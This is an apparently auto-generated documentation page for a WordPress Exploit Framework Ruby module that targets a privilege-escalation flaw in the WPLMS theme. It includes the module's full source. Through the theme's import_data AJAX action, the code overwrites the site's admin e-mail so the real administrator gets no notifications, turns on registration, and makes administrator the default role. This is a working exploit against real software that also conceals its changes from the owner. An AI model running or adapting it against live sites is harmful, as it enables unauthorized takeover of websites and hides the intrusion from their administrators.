Class: Wpxf::Auxiliary::WplmsPrivilegeEscalation

Inherits:
Module
  • Object
Includes:
Wpxf, Net::HttpClient, WordPress::Login
Defined in:
lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ WplmsPrivilegeEscalation

Returns a new instance of WplmsPrivilegeEscalation.



# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 10

# Builds the module and registers its metadata (name, description, authors,
# references and publication date) with the framework via update_info.
#
# The description is kept as a %() literal because desc_preformatted is set:
# its leading newline and indentation are part of the displayed text.
def initialize
  super

  description = %(
      The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows
      an authenticated user of any user level to set any system option
      due to a lack of validation in the import_data function of
      /includes/func.php.

      The module first changes the admin e-mail address to prevent any
      notifications being sent to the actual administrator during the
      attack, re-enables user registration in case it has been
      disabled and sets the default role to be administrator.
      This will allow for the user to create a new account with admin
      privileges via the default registration page found at
      /wp-login.php?action=register.
    )

  info = {
    name: 'WPLMS Theme Privilege Escalation',
    desc: description,
    desc_preformatted: true,
    # 'Evex' - vulnerability discovery; 'rastating' - WPXF module
    author: ['Evex', 'rastating'],
    references: [['WPVDB', '7785']],
    date: 'Feb 09 2015'
  }

  update_info(**info)
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 41

# Fingerprints the installed WPLMS theme from its readme and reports whether
# its version falls inside the range the module description names
# (1.5.2 up to and including 1.8.4.1; 1.8.4.2 is the first version past it).
#
# @return [Object] whatever check_theme_version_from_readme returns
def check
  # Argument order (theme name, fixed version, first affected version) is
  # presumably what WordPress::Fingerprint expects - confirm there.
  first_affected = '1.5.2'
  first_fixed = '1.8.4.2'
  check_theme_version_from_readme('wplms', first_fixed, first_affected)
end

#php_serialize(value) ⇒ String, nil



# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 49

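# Encodes +value+ in PHP's serialize() wire format.
#
# Only the two shapes this module writes are supported:
#   * strings / symbols -> s:<byte length>:"<bytes>";
#   * integers          -> i:<digits>;
#
# The string form is length-prefixed, so the length must be the byte size
# (not the character count) and no quoting or escaping of the content is
# performed. Symbols are converted with to_s first: Symbol does not respond
# to bytesize, so the previous branch raised NoMethodError for symbols.
#
# @param value [String, Symbol, Integer] value to serialise
# @return [String, nil] serialised form, or nil for any unsupported type
#   (Float, true/false, nil, arrays, ...)
def php_serialize(value)
  case value
  when String, Symbol
    str = value.to_s
    "s:#{str.bytesize}:\"#{str}\";"
  when Integer
    "i:#{value};"
  end
end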

#requires_authentication ⇒ Boolean



# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 45

# Declares that this module needs a logged-in WordPress session.
#
# The session_cookie that set_wp_option sends is presumably obtained by the
# framework from that login before #run is called - confirm in Module.
#
# @return [Boolean] always true
def requires_authentication
  true
end

#run ⇒ Boolean



# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 89

# Writes the three WordPress options the module relies on, one after the
# other, aborting at the first step that fails.
#
# Order: admin_email (random throw-away address), users_can_register (1),
# default_role ('administrator'). A step counts as failed only when
# set_wp_option returns nil; a non-200 HTTP reply is still a response
# object and is therefore treated as success here.
#
# @return [Boolean] false when super declines to run or a step fails,
#   true after all three options were written
def run
  return false unless super

  new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"

  # Each entry: [progress message, option name, value, failure message]
  steps = [
    ["Changing admin e-mail address to #{new_email}...", 'admin_email', new_email,
     'Failed to change the admin e-mail address'],
    ['Enabling user registrations...', 'users_can_register', 1,
     'Failed to enable user registrations'],
    ['Setting the default user role...', 'default_role', 'administrator',
     'Failed to set the default user role']
  ]

  steps.each do |progress, option, value, failure|
    emit_info progress
    next unless set_wp_option(option, value).nil?

    emit_error failure
    return false
  end

  register_url = normalize_uri(full_uri, 'wp-login.php?action=register')
  emit_success 'Privilege escalation complete'
  emit_success "Create a new account at #{register_url} to gain admin access."

  true
end

#serialize_and_encode(value) ⇒ String, nil



# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 59

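# Serialises +value+ in PHP format (see php_serialize) and Base64-encodes
# the result without line wrapping.
#
# @param value [String, Symbol, Integer] value to encode
# @return [String, nil] strict Base64 of the serialised value, or nil when
#   php_serialize does not support the value's type
def serialize_and_encode(value)
  serialized_value = php_serialize(value)
  # Unsupported types come back as nil; stop here rather than handing nil
  # to Base64 (TypeError). The guard must trigger on nil, not on a value -
  # the inverted form dropped every valid value and crashed on the bad ones.
  return nil if serialized_value.nil?

  Base64.strict_encode64(serialized_value)
end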

#set_wp_option(name, value) ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 66

# Encodes +value+ and posts it to admin-ajax.php as the WordPress option
# +name+, using the theme's import_data action and the current session.
#
# @param name [String] WordPress option name to write
# @param value [String, Symbol, Integer] new value; types php_serialize
#   does not handle are reported with emit_error and skipped
# @return [Object, nil] the object execute_post_request returned, or nil
#   when the value could not be encoded or there was no response. A reply
#   whose code is not 200 is only warned about and still returned, so
#   callers that test for nil alone will treat it as success.
def set_wp_option(name, value)
  payload = serialize_and_encode(value)
  if payload.nil?
    emit_error "Failed to serialize #{value}", true
    return nil
  end

  request = {
    url: wordpress_url_admin_ajax,
    params: { 'action' => 'import_data' },
    body: { 'name' => name, 'code' => payload },
    cookie: session_cookie
  }
  res = execute_post_request(**request)

  case
  when res.nil?
    emit_error 'No response from the target', true
  when res.code != 200
    emit_warning "Server responded with code #{res.code}", true
  end

  res
end